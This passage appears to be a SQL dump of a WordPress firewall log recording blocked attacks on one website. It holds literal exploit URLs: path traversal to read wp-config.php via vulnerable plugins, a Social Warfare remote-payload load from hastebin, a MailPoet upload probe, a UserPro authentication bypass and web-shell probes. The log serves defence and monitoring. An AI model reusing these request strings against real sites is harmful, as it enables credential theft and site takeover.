wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1twYXRoXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1zdXBwb3J0LXBsdXMtcmVzcG9uc2l2ZS10aWNrZXQtc3lzdGVtL2luY2x1ZGVzL2FkbWluL2Rvd25sb2FkQXR0YWNobWVudC5waHA=\",\"category\":\"lfi\",\"ssl\":1}'),(112,1627806889.442267,1627806889.339400,'\0\0\0\0\0\0\0\0\0\0��M�N',0,403,0,0,0,'https://www.westonspirit.org.uk/plugins/content/apismtp/apismtp.php.suspected?test=hello',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3BsdWdpbnMvY29udGVudC9hcGlzbXRwL2FwaXNtdHAucGhwLnN1c3BlY3RlZA==\",\"category\":\"brute-force\",\"ssl\":1}'),(113,1627806883.177450,1627806883.063100,'\0\0\0\0\0\0\0\0\0\0��M�N',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-content/plugins/apikey/apikey.php.suspected?test=hello',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9hcGlrZXkvYXBpa2V5LnBocC5zdXNwZWN0ZWQ=\",\"category\":\"brute-force\",\"ssl\":1}'),(114,1627806879.188558,1627806879.104200,'\0\0\0\0\0\0\0\0\0\0��M�N',0,403,0,0,0,'https://www.westonspirit.org.uk/plugins/content/apismtp/apismtp.php?test=hello',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3BsdWdpbnMvY29udGVudC9hcGlzbXRwL2FwaXNtdHAucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(115,1627806874.691989,1627806874.600200,'\0\0\0\0\0\0\0\0\0\0��M�N',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-content/plugins/apikey/apikey.php?test=hello',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9hcGlrZXkvYXBpa2V5LnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(116,1627818462.332527,1627818462.240700,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-admin/admin-post.php?swp_debug=load_options&swp_url=https%3A%2F%2Fhastebin.com%2Fraw%2Fetonipusij',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Social Warfare <= 3.5.2 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"136\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tzd3BfdXJsXQ==\",\"paramValue\":\"aHR0cHM6Ly9oYXN0ZWJpbi5jb20vcmF3L2V0b25pcHVzaWo=\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":1}'),(117,1627818468.233008,1627818468.131100,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-admin/admin-ajax.php?action=revslider_show_image&img=..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tpbWdd\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(118,1627818466.769412,1627818466.680900,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-admin/admin-post.php?page=wysija_campaigns&action=themes',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','MailPoet <= 2.6.7 - Arbitrary File Upload','{\"learningMode\":0,\"failedRules\":\"65\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"bnVsbA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"file_upload\",\"ssl\":1}'),(119,1627818473.852494,1627818473.772800,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/?up_auto_log=true',NULL,'Mozilla/5.0 (Windows NT 6.1; rv:36.0) Gecko/20100101 Firefox/36.0','blocked:waf','UserPro - User Profiles with Social Login <= 4.9.17 - Authentication Bypass','{\"learningMode\":0,\"failedRules\":\"106\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t1cF9hdXRvX2xvZ10=\",\"paramValue\":\"dHJ1ZQ==\",\"path\":\"Lw==\",\"category\":\"auth-bypass\",\"ssl\":1}'),(120,1627818502.539067,1627818502.462300,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-content/plugins/ungallery/source_vuln.php?pic=..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1twaWNd\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy91bmdhbGxlcnkvc291cmNlX3Z1bG4ucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(121,1627818501.852245,1627818501.770100,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php?path=..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1twYXRoXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1zdXBwb3J0LXBsdXMtcmVzcG9uc2l2ZS10aWNrZXQtc3lzdGVtL2luY2x1ZGVzL2FkbWluL2Rvd25sb2FkQXR0YWNobWVudC5waHA=\",\"category\":\"lfi\",\"ssl\":1}'),(122,1627824633.367319,1627824633.285500,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-admin/admin-post.php?swp_debug=load_options&swp_url=https%3A%2F%2Fhastebin.com%2Fraw%2Fetonipusij',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Social Warfare <= 3.5.2 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"136\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tzd3BfdXJsXQ==\",\"paramValue\":\"aHR0cHM6Ly9oYXN0ZWJpbi5jb20vcmF3L2V0b25pcHVzaWo=\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":1}'),(123,1627824639.482192,1627824639.407600,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-admin/admin-ajax.php?action=revslider_show_image&img=..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tpbWdd\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(124,1627824638.126706,1627824638.009200,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-admin/admin-post.php?page=wysija_campaigns&action=themes',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','MailPoet <= 2.6.7 - Arbitrary File Upload','{\"learningMode\":0,\"failedRules\":\"65\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"bnVsbA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"file_upload\",\"ssl\":1}'),(125,1627824645.447590,1627824645.372100,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/?up_auto_log=true',NULL,'Mozilla/5.0 (Windows NT 6.1; rv:36.0) Gecko/20100101 Firefox/36.0','blocked:waf','UserPro - User Profiles with Social Login <= 4.9.17 - Authentication Bypass','{\"learningMode\":0,\"failedRules\":\"106\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t1cF9hdXRvX2xvZ10=\",\"paramValue\":\"dHJ1ZQ==\",\"path\":\"Lw==\",\"category\":\"auth-bypass\",\"ssl\":1}'),(126,1627824671.051503,1627824670.977200,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-content/plugins/ungallery/source_vuln.php?pic=..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1twaWNd\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy91bmdhbGxlcnkvc291cmNlX3Z1bG4ucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(127,1627824670.409178,1627824670.322700,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php?path=..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1twYXRoXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1zdXBwb3J0LXBsdXMtcmVzcG9uc2l2ZS10aWNrZXQtc3lzdGVtL2luY2x1ZGVzL2FkbWluL2Rvd25sb2FkQXR0YWNobWVudC5waHA=\",\"category\":\"lfi\",\"ssl\":1}'),(128,1627829512.863258,1627829512.785100,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-admin/admin-post.php?swp_debug=load_options&swp_url=https%3A%2F%2Fhastebin.com%2Fraw%2Fetonipusij',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Social Warfare <= 3.5.2 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"136\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tzd3BfdXJsXQ==\",\"paramValue\":\"aHR0cHM6Ly9oYXN0ZWJpbi5jb20vcmF3L2V0b25pcHVzaWo=\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":1}'),(129,1627829518.717477,1627829518.623100,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-admin/admin-ajax.php?action=revslider_show_image&img=..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tpbWdd\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(130,1627829517.363196,1627829517.285600,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-admin/admin-post.php?page=wysija_campaigns&action=themes',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','MailPoet <= 2.6.7 - Arbitrary File Upload','{\"learningMode\":0,\"failedRules\":\"65\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"bnVsbA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"file_upload\",\"ssl\":1}'),(131,1627829524.324571,1627829524.250800,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/?up_auto_log=true',NULL,'Mozilla/5.0 (Windows NT 6.1; rv:36.0) Gecko/20100101 Firefox/36.0','blocked:waf','UserPro - User Profiles with Social Login <= 4.9.17 - Authentication Bypass','{\"learningMode\":0,\"failedRules\":\"106\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t1cF9hdXRvX2xvZ10=\",\"paramValue\":\"dHJ1ZQ==\",\"path\":\"Lw==\",\"category\":\"auth-bypass\",\"ssl\":1}'),(132,1627829548.863306,1627829548.786200,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-content/plugins/ungallery/source_vuln.php?pic=..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1twaWNd\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy91bmdhbGxlcnkvc291cmNlX3Z1bG4ucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(133,1627829548.149118,1627829548.071100,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php?path=..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1twYXRoXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1zdXBwb3J0LXBsdXMtcmVzcG9uc2l2ZS10aWNrZXQtc3lzdGVtL2luY2x1ZGVzL2FkbWluL2Rvd25sb2FkQXR0YWNobWVudC5waHA=\",\"category\":\"lfi\",\"ssl\":1}'),(134,1627831511.887090,1627831511.809100,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-admin/admin-post.php?swp_debug=load_options&swp_url=https%3A%2F%2Fhastebin.com%2Fraw%2Fetonipusij',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Social Warfare <= 3.5.2 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"136\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tzd3BfdXJsXQ==\",\"paramValue\":\"aHR0cHM6Ly9oYXN0ZWJpbi5jb20vcmF3L2V0b25pcHVzaWo=\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":1}'),(135,1627831518.059209,1627831517.983300,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-admin/admin-ajax.php?action=revslider_show_image&img=..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tpbWdd\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(136,1627831516.673947,1627831516.595900,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-admin/admin-post.php?page=wysija_campaigns&action=themes',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','MailPoet <= 2.6.7 - Arbitrary File Upload','{\"learningMode\":0,\"failedRules\":\"65\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"bnVsbA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"file_upload\",\"ssl\":1}'),(137,1627831524.054359,1627831523.981400,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/?up_auto_log=true',NULL,'Mozilla/5.0 (Windows NT 6.1; rv:36.0) Gecko/20100101 Firefox/36.0','blocked:waf','UserPro - User Profiles with Social Login <= 4.9.17 - Authentication Bypass','{\"learningMode\":0,\"failedRules\":\"106\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t1cF9hdXRvX2xvZ10=\",\"paramValue\":\"dHJ1ZQ==\",\"path\":\"Lw==\",\"category\":\"auth-bypass\",\"ssl\":1}'),(138,1627831548.882321,1627831548.806600,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-content/plugins/ungallery/source_vuln.php?pic=..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1twaWNd\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy91bmdhbGxlcnkvc291cmNlX3Z1bG4ucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(139,1627831548.225099,1627831548.127300,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php?path=..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1twYXRoXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1zdXBwb3J0LXBsdXMtcmVzcG9uc2l2ZS10aWNrZXQtc3lzdGVtL2luY2x1ZGVzL2FkbWluL2Rvd25sb2FkQXR0YWNobWVudC5waHA=\",\"category\":\"lfi\",\"ssl\":1}'),(140,1627840010.289213,1627840010.174000,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-admin/admin-post.php?swp_debug=load_options&swp_url=https%3A%2F%2Fhastebin.com%2Fraw%2Fetonipusij',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Social Warfare <= 3.5.2 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"136\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tzd3BfdXJsXQ==\",\"paramValue\":\"aHR0cHM6Ly9oYXN0ZWJpbi5jb20vcmF3L2V0b25pcHVzaWo=\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":1}'),(141,1627840016.092754,1627840016.015100,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-admin/admin-ajax.php?action=revslider_show_image&img=..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tpbWdd\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(142,1627840014.710492,1627840014.636500,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-admin/admin-post.php?page=wysija_campaigns&action=themes',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','MailPoet <= 2.6.7 - Arbitrary File Upload','{\"learningMode\":0,\"failedRules\":\"65\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"bnVsbA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"file_upload\",\"ssl\":1}'),(143,1627840021.506769,1627840021.431900,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/?up_auto_log=true',NULL,'Mozilla/5.0 (Windows NT 6.1; rv:36.0) Gecko/20100101 Firefox/36.0','blocked:waf','UserPro - User Profiles with Social Login <= 4.9.17 - Authentication Bypass','{\"learningMode\":0,\"failedRules\":\"106\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t1cF9hdXRvX2xvZ10=\",\"paramValue\":\"dHJ1ZQ==\",\"path\":\"Lw==\",\"category\":\"auth-bypass\",\"ssl\":1}'),(144,1627840046.216197,1627840046.141300,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-content/plugins/ungallery/source_vuln.php?pic=..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1twaWNd\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy91bmdhbGxlcnkvc291cmNlX3Z1bG4ucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(145,1627840045.546252,1627840045.471300,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php?path=..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1twYXRoXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1zdXBwb3J0LXBsdXMtcmVzcG9uc2l2ZS10aWNrZXQtc3lzdGVtL2luY2x1ZGVzL2FkbWluL2Rvd25sb2FkQXR0YWNobWVudC5waHA=\",\"category\":\"lfi\",\"ssl\":1}'),(146,1627859859.380977,1627859859.286200,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-admin/admin-post.php?swp_debug=load_options&swp_url=https%3A%2F%2Fhastebin.com%2Fraw%2Fetonipusij',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Social Warfare <= 3.5.2 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"136\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tzd3BfdXJsXQ==\",\"paramValue\":\"aHR0cHM6Ly9oYXN0ZWJpbi5jb20vcmF3L2V0b25pcHVzaWo=\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":1}'),(147,1627859866.197630,1627859866.115200,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-admin/admin-ajax.php?action=revslider_show_image&img=..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - 